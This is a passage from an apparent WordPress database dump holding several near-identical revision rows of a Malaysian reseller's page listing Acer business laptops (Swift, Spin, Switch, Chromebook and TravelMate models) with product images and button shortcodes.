features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:33:14','2019-09-17 09:33:14','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3110,1,'2019-09-17 17:34:30','2019-09-17 09:34:30','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:34:30','2019-09-17 09:34:30','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3109,1,'2019-09-17 17:33:52','2019-09-17 09:33:52','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:33:52','2019-09-17 09:33:52','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3111,1,'2019-09-17 17:34:56','2019-09-17 09:34:56','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:34:56','2019-09-17 09:34:56','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3112,1,'2019-09-17 17:36:07','2019-09-17 09:36:07','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" 